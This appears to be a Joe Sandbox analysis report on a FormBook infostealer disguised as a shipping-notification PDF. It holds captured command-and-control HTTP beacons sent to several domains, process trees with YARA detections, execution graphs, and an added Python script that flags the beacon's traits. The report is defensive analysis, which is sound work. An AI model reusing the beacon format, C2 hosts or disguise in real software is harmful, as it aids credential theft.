                                        Data Ascii: 3h-p=46Mpa+0pKAQYe5i2ukU/dcaIjQDRPEMAmH0uURyOmoybsyb0k/2P1RKYKtFtYq19evjSTcfCmxzsqZhl+HC7yfWnJAU9lI27OxF+DqivwY+4zEw7Timi5nqoQ+k92J6jj826P2nDMpr3N0dgzHb37PQHsqKlZwvZFtXGLDbXZWa75u+AnfnE57Y/33dcG0A3kEWYEFq0pWH+wi3FoBeKJ78efSbV/xMLlrS8SLg=
                                        Sep 27, 2024 06:37:14.082459927 CEST | 116 | IN | HTTP/1.1 404 Not Found
                                        Server: Caddy
                                        Date: Fri, 27 Sep 2024 04:37:13 GMT
                                        Content-Length: 0
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        31 | 192.168.2.7 | 54983 | 34.76.205.124 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:37:17.270239115 CEST | 1783 | OUT | POST /yxqi/ HTTP/1.1
                                        Host: www.exhibitarrange.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.exhibitarrange.shop
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.exhibitarrange.shop/yxqi/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 34 36 4d 70 61 2b 30 70 4b 41 51 59 65 35 69 32 75 6b 55 2f 64 63 61 49 6a 51 44 52 50 45 4d 41 6d 48 30 75 55 52 79 4f 6d 70 6d 62 73 42 54 30 6b 63 4f 50 30 52 4b 59 55 39 46 73 59 71 31 67 65 76 71 61 54 63 61 2f 6d 7a 37 73 34 4f 68 6c 33 53 75 37 38 66 57 6e 57 51 55 38 68 49 32 75 4f 79 39 68 44 71 79 76 77 59 2b 34 7a 43 55 37 45 6a 6d 69 31 48 72 61 5a 65 6b 70 79 4a 36 4c 6a 2f 48 42 50 32 6a 39 4e 61 54 33 4d 55 4e 67 31 6a 37 33 6d 2f 51 4a 76 71 4b 44 5a 77 6a 77 46 74 36 35 4c 44 75 43 5a 56 4b 37 36 49 4c 57 30 62 6e 4d 6b 72 41 53 2b 48 42 72 42 46 6b 6d 70 32 75 58 4e 79 57 77 71 47 47 41 35 7a 58 61 75 32 76 72 54 71 6c 70 58 6d 6a 56 76 42 31 33 2b 4b 2b 5a 52 4d 49 73 32 71 64 71 54 7a 32 35 62 50 71 59 2b 67 69 58 34 50 43 33 74 6a 56 33 63 72 6c 59 69 67 6b 49 70 36 6c 59 67 44 6a 35 74 78 47 32 4e 77 4e 42 52 6f 68 55 66 46 69 51 77 6a 49 53 49 48 49 6c 43 53 74 6a 4c 77 38 52 53 47 4d 67 43 4a 2f 42 56 47 44 4e 50 77 31 62 50 71 68 37 59 65 44 48 69 5a 52 54 76 [TRUNCATED]
                                        Data Ascii: 3h-p= [TRUNCATED]
                                        Sep 27, 2024 06:37:17.893306971 CEST | 116 | IN | HTTP/1.1 404 Not Found
                                        Server: Caddy
                                        Date: Fri, 27 Sep 2024 04:37:17 GMT
                                        Content-Length: 0
                                        Connection: close
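
                                        The ten sessions above share one shape: the same User-Agent on every request; a POST to a short directory path (/orig/, /f1ix/, /yxqi/) whose form body is a single key, 3h-p, carrying an opaque base64-looking blob; a later GET carrying that key plus a second short key, yP, in the query string; Origin and Referer pointing back at the request's own Host over plain HTTP; and the same key reused against three unrelated domains on three different IPs within about thirty seconds, regardless of whether the server answers 404 or 200. The Python below is an added example, not part of this Joe Sandbox report and not Joe Security's or FormBook's code: it parses raw HTTP requests of this form and reports which of those traits each one matches, then pivots on form/query keys that recur across hosts. The key names 3h-p and yP, the User-Agent and the three hosts are taken from this capture and treated as inputs, not as constants of the family; the benign control request is constructed; the statement that Chrome only began advertising Brotli (br) around version 50 is the editor's, not the report's.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# User-Agent string sent on every request in sessions 22-31 of this report.
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36"
)
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")  # opaque base64-looking value
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")       # /orig/, /f1ix/, /yxqi/ style paths


@dataclass
class Request:
    method: str
    target: str
    headers: dict
    body: str


def raw_params(source: str) -> dict:
    """Split key=value&key2=value2 WITHOUT url-decoding: '+' and '/' inside the blobs must survive."""
    params = {}
    for pair in filter(None, source.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def parse_request(raw: str) -> Request:
    """Parse one raw HTTP/1.1 request: request line, header lines, blank line, body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers, body.strip())


def beacon_indicators(req: Request) -> list:
    """Names of the indicators this request matches; an empty list means nothing matched."""
    hits = []
    h = req.headers
    host = h.get("host", "")
    ua = h.get("user-agent", "")
    parts = urlsplit(req.target)
    if ua == BEACON_UA:
        hits.append("known-ua")
    # Brotli ("br") only appeared in Chrome around v50; a Chrome/41 UA advertising it is a fingerprint mismatch.
    encodings = [e.strip() for e in h.get("accept-encoding", "").split(",")]
    if "Chrome/41." in ua and "br" in encodings:
        hits.append("ua-encoding-mismatch")
    if SHORT_DIR.match(parts.path):
        hits.append("short-dir-path")
    # Origin and Referer point back at the request's own Host over plain HTTP, as on every POST above.
    if host and h.get("origin") == f"http://{host}" and h.get("referer", "").startswith(f"http://{host}/"):
        hits.append("self-referential-origin")
    params = raw_params(req.body if req.method == "POST" else parts.query)
    if any(B64_BLOB.match(v) for v in params.values()):
        hits.append("opaque-blob-param")
    return hits


def shared_param_keys(requests: list) -> dict:
    """Map each form/query key to the Hosts it was sent to, keeping only keys seen on 2+ hosts."""
    seen = {}
    for req in requests:
        parts = urlsplit(req.target)
        source = req.body if req.method == "POST" else parts.query
        for key in raw_params(source):
            seen.setdefault(key, set()).add(req.headers.get("host", ""))
    return {k: hosts for k, hosts in seen.items() if len(hosts) >= 2}


# Constructed sample input, trimmed from sessions 22 and 28 above; the third request is a made-up benign control.
SAMPLE_POST = """POST /orig/ HTTP/1.1
Host: www.priunit.online
Accept-Encoding: gzip, deflate, br
Origin: http://www.priunit.online
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.priunit.online/orig/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36

3h-p=m/Ee8y2iD1ewbQzZfClO1Wd9kMHjJyPjJ4aB+j4iKa9jBqxuO2V3caI7JV2SyxCS9hQVU1XydjKYwgdYdFVHdtJczgU/VZ3nyRKEZy/+eaRh1+7+5/NlPNXF9qn/9ULMOvcyg39BEz4G2QI6FZ4MVeDGBqZZFn5PUbiW/NlmhOTrMfjcqjD0HMVFEHqwGFDStXLh7gO950Y3U13f+duZIt+LGU/Waz0eVqTOma4=
"""
SAMPLE_GET = """GET /f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6 HTTP/1.1
Host: www.consultarfacil.online
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
"""
SAMPLE_BENIGN = """GET /index.html HTTP/1.1
Host: example.com
User-Agent: curl/8.0.1
Accept: */*
"""

if __name__ == "__main__":
    reqs = [parse_request(r) for r in (SAMPLE_POST, SAMPLE_GET, SAMPLE_BENIGN)]
    for req in reqs:
        print(req.method, req.headers.get("host"), beacon_indicators(req))
    print(shared_param_keys(reqs))
```

                                        Run as a script it prints the indicator list per request and the keys shared across hosts. The cross-host key reuse from shared_param_keys is the pivot least tied to any one domain: the function derives the keys from the traffic itself instead of hard-coding 3h-p, so it keeps working on a capture whose sample uses a different key, and it only needs two of the rotated hosts to be present. The per-request indicators are deliberately split out so that a single one (the User-Agent alone, or a short directory path alone) can be treated as low confidence while the full set is high.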


                                        Target ID: 5
                                        Start time: 00:34:09
                                        Start date: 27/09/2024
                                        Path: C:\Users\user\Desktop\shipping notification_pdf.exe
                                        Wow64 process (32bit): true
                                        Commandline: "C:\Users\user\Desktop\shipping notification_pdf.exe"
                                        Imagebase: 0x400000
                                        File size: 1'359'839 bytes
                                        MD5 hash: D9E239C79F89EC481EC939D7F784C89E
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: low
                                        Has exited: true

                                        Target ID: 8
                                        Start time: 00:34:15
                                        Start date: 27/09/2024
                                        Path: C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit): true
                                        Commandline: "C:\Users\user\Desktop\shipping notification_pdf.exe"
                                        Imagebase: 0xca0000
                                        File size: 46'504 bytes
                                        MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:00:34:27
                                        Start date:27/09/2024
                                        Path:C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe"
                                        Imagebase:0x30000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:11
                                        Start time:01:52:33
                                        Start date:27/09/2024
                                        Path:C:\Windows\SysWOW64\sort.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\sort.exe"
                                        Imagebase:0x700000
                                        File size:24'576 bytes
                                        MD5 hash:D0D6250804C3102A17051406BBDBF3D6
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        Target ID:12
                                        Start time:01:52:47
                                        Start date:27/09/2024
                                        Path:C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe"
                                        Imagebase:0x30000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:14
                                        Start time:01:53:06
                                        Start date:27/09/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff722870000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:1.4%
                                          Dynamic/Decrypted Code Coverage:5.4%
                                          Signature Coverage:8.5%
                                          Total number of Nodes:130
                                          Total number of Limit Nodes:9
                                          execution_graph 78258 42f413 78261 42e1f3 78258->78261 78264 42c463 78261->78264 78263 42e20c 78265 42c47d 78264->78265 78266 42c48e RtlFreeHeap 78265->78266 78266->78263 78267 42e2d3 78270 42c413 78267->78270 78269 42e2ee 78271 42c430 78270->78271 78272 42c441 RtlAllocateHeap 78271->78272 78272->78269 78273 424463 78274 42447f 78273->78274 78275 4244a7 78274->78275 78276 4244bb 78274->78276 78277 42c0e3 NtClose 78275->78277 78283 42c0e3 78276->78283 78279 4244b0 78277->78279 78280 4244c4 78286 42e313 RtlAllocateHeap 78280->78286 78282 4244cf 78284 42c0fd 78283->78284 78285 42c10e NtClose 78284->78285 78285->78280 78286->78282 78377 4247f3 78382 42480c 78377->78382 78378 42489c 78379 424854 78380 42e1f3 RtlFreeHeap 78379->78380 78381 424864 78380->78381 78382->78378 78382->78379 78383 424897 78382->78383 78384 42e1f3 RtlFreeHeap 78383->78384 78384->78378 78385 42b6b3 78386 42b6d0 78385->78386 78389 3672df0 LdrInitializeThunk 78386->78389 78387 42b6f8 78389->78387 78247 413ac3 78248 413add 78247->78248 78253 417273 78248->78253 78250 413afb 78251 413b40 78250->78251 78252 413b2f PostThreadMessageW 78250->78252 78252->78251 78254 417297 78253->78254 78255 4172d3 LdrLoadDll 78254->78255 78256 41729e 78254->78256 78255->78256 78256->78250 78287 41ada3 78288 41ade7 78287->78288 78289 41ae08 78288->78289 78290 42c0e3 NtClose 78288->78290 78290->78289 78390 41a073 78391 41a0e5 78390->78391 78392 41a08b 78390->78392 78392->78391 78394 41dfa3 78392->78394 78395 41dfc9 78394->78395 78399 41e0c0 78395->78399 78400 42f453 RtlAllocateHeap RtlFreeHeap 78395->78400 78397 41e05e 78398 42b703 LdrInitializeThunk 78397->78398 78397->78399 78398->78399 78399->78391 78400->78397 78401 4135b3 78402 413562 78401->78402 78403 413549 78401->78403 78406 42c373 78402->78406 78407 42c38d 78406->78407 78410 3672c70 LdrInitializeThunk 78407->78410 78408 413575 78410->78408 78257 3672b60 LdrInitializeThunk 78291 418828 78292 42c0e3 NtClose 78291->78292 
78293 418832 78292->78293 78294 4019ed 78295 4019ee 78294->78295 78295->78295 78298 42f883 78295->78298 78301 42dda3 78298->78301 78302 42ddc9 78301->78302 78313 4073b3 78302->78313 78304 42dddf 78312 401b1f 78304->78312 78316 41abb3 78304->78316 78306 42ddfe 78309 42de13 78306->78309 78331 42c4b3 78306->78331 78327 427d83 78309->78327 78310 42de2d 78311 42c4b3 ExitProcess 78310->78311 78311->78312 78315 4073c0 78313->78315 78334 415f33 78313->78334 78315->78304 78317 41abdf 78316->78317 78352 41aaa3 78317->78352 78320 41ac24 78322 41ac40 78320->78322 78325 42c0e3 NtClose 78320->78325 78321 41ac0c 78323 41ac17 78321->78323 78324 42c0e3 NtClose 78321->78324 78322->78306 78323->78306 78324->78323 78326 41ac36 78325->78326 78326->78306 78328 427de4 78327->78328 78330 427df1 78328->78330 78363 4180d3 78328->78363 78330->78310 78332 42c4d0 78331->78332 78333 42c4e1 ExitProcess 78332->78333 78333->78309 78335 415f4d 78334->78335 78337 415f66 78335->78337 78338 42cb73 78335->78338 78337->78315 78340 42cb8d 78338->78340 78339 42cbbc 78339->78337 78340->78339 78345 42b703 78340->78345 78343 42e1f3 RtlFreeHeap 78344 42cc35 78343->78344 78344->78337 78346 42b71d 78345->78346 78349 3672c0a 78346->78349 78347 42b749 78347->78343 78350 3672c11 78349->78350 78351 3672c1f LdrInitializeThunk 78349->78351 78350->78347 78351->78347 78353 41aabd 78352->78353 78357 41ab99 78352->78357 78358 42b7a3 78353->78358 78356 42c0e3 NtClose 78356->78357 78357->78320 78357->78321 78359 42b7bd 78358->78359 78362 36735c0 LdrInitializeThunk 78359->78362 78360 41ab8d 78360->78356 78362->78360 78365 4180d6 78363->78365 78364 41860b 78364->78330 78365->78364 78371 413733 78365->78371 78367 41822a 78367->78364 78368 42e1f3 RtlFreeHeap 78367->78368 78369 418242 78368->78369 78369->78364 78370 42c4b3 ExitProcess 78369->78370 78370->78364 78372 413743 78371->78372 78374 4137bc 78372->78374 78376 41aec3 RtlFreeHeap LdrInitializeThunk 78372->78376 78374->78367 78375 4137b2 78375->78367 78376->78375

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 58 417273-41728f 59 417297-41729c 58->59 60 417292 call 42eef3 58->60 61 4172a2-4172b0 call 42f4f3 59->61 62 41729e-4172a1 59->62 60->59 65 4172c0-4172d1 call 42d873 61->65 66 4172b2-4172bd call 42f793 61->66 71 4172d3-4172e7 LdrLoadDll 65->71 72 4172ea-4172ed 65->72 66->65 71->72
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172E5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: cc2e2eeabfe5aa2f3bcae61bb068a042517829d55ca8f3e828244603fde8ea91
                                          • Instruction ID: 5b3866d6c55456efcc321e0210c3b5a891dda245b75723c478729dde4aefc097
                                          • Opcode Fuzzy Hash: cc2e2eeabfe5aa2f3bcae61bb068a042517829d55ca8f3e828244603fde8ea91
                                          • Instruction Fuzzy Hash: 9C0152B5E0010DA7DB10DAE1DC42FDEB378AB54308F0041A6F90897240F674EB498755

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 83 42c0e3-42c11c call 404783 call 42d363 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C117
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 1ebc1b17328d7b51ea5f62271b12f00b040010b2dc37a92e0c9861cf2918f4dd
                                          • Instruction ID: b2fbfe8fb6e7c75b6336c3620b2fb76b95cdf9ae85106dfdfef08fe293474b96
                                          • Opcode Fuzzy Hash: 1ebc1b17328d7b51ea5f62271b12f00b040010b2dc37a92e0c9861cf2918f4dd
                                          • Instruction Fuzzy Hash: 9CE04F716002147BD510EA6ADC42FAB77ACDFC5B24F00401AFE5C67142C7757A1086E5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 100 36735c0-36735cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                          • Instruction ID: 14704e88bd9990a7bf10593cddd3698b0d90077dcbd448423a2d23fe0b545408
                                          • Opcode Fuzzy Hash: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                          • Instruction Fuzzy Hash: 3A90023160550802D100B6584554746100687D4301FA5C511A042466CE87D58A5165A2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 3672b60-3672b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                          • Instruction ID: 477d092c06117334780cd49e62da7514cc2248fe399308c3f7817f4bebfa49c6
                                          • Opcode Fuzzy Hash: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                          • Instruction Fuzzy Hash: 87900261202404034105B6584454656400B87E4301B95C121E1014694EC66589916125

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 99 3672df0-3672dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                          • Instruction ID: 6cebf13566ce982b6a45d412a60939e0e5e16a162780faa10336b83753f66aa7
                                          • Opcode Fuzzy Hash: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                          • Instruction Fuzzy Hash: 4490023120140813D111B6584544747000A87D4341FD5C512A042465CE97968A52A121

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 98 3672c70-3672c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                          • Instruction ID: 57c9decabb3b232f45a361f624714e0ec6778d0d7793dceab87a2f73d3ff40a1
                                          • Opcode Fuzzy Hash: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                          • Instruction Fuzzy Hash: 5890023120148C02D110B658844478A000687D4301F99C511A442475CE87D589917121
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4ecc94f66fa931a6cbf2a0985ec9c70e5e19c083577cbe8796aad7140df6bcb3
                                          • Instruction ID: 0e8a4bae6d7bc7a9ba776a69328887685c5c56d7e6b9e4bfc3edb8f009fde6d9
                                          • Opcode Fuzzy Hash: 4ecc94f66fa931a6cbf2a0985ec9c70e5e19c083577cbe8796aad7140df6bcb3
                                          • Instruction Fuzzy Hash: 64F1B271D0021AAFDB24CF94DC81AEFB779AF44304F1481AEE509A7241DB786A85CFA5

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 00413B3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd$LDio
                                          • API String ID: 1836367815-2040179008
                                          • Opcode ID: d50d47f08f1558f057d5d50af4955f50951a7d766de3ac934ba27d1afa362163
                                          • Instruction ID: 4c2db3f50435653be87fdf8d6a58eb032816d9e8d6e1fc640914c5323c749873
                                          • Opcode Fuzzy Hash: d50d47f08f1558f057d5d50af4955f50951a7d766de3ac934ba27d1afa362163
                                          • Instruction Fuzzy Hash: E8119071D4415CBAD7019EA58C42DEF777CDF51344F0540AEFA10AF203E6394E4647A9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 28 413ac3-413ae2 call 42e293 31 413ae8-413b2d call 417273 call 4046f3 call 424913 28->31 32 413ae3 call 42eca3 28->32 39 413b4d-413b53 31->39 40 413b2f-413b3e PostThreadMessageW 31->40 32->31 40->39 41 413b40-413b4a 40->41 41->39
                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 00413B3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          • Opcode ID: 13f27cb120bce7ef212d6baadc346e71d7071e3ba32befbfdf505d968f7fdb4a
                                          • Instruction ID: b6af01b8b705b66541c63c8a1320813ea0937786d36182b91cb1b70c8a091e59
                                          • Opcode Fuzzy Hash: 13f27cb120bce7ef212d6baadc346e71d7071e3ba32befbfdf505d968f7fdb4a
                                          • Instruction Fuzzy Hash: D9012BB1D0015C7AEB10AAE19C82DEFBB7CDF41794F00806AFA0467202E5784F0647B5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 14 413abd-413ad5 15 413add-413ae2 14->15 16 413ad8 call 42e293 14->16 17 413ae8-413b2d call 417273 call 4046f3 call 424913 15->17 18 413ae3 call 42eca3 15->18 16->15 25 413b4d-413b53 17->25 26 413b2f-413b3e PostThreadMessageW 17->26 18->17 26->25 27 413b40-413b4a 26->27 27->25
                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 00413B3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
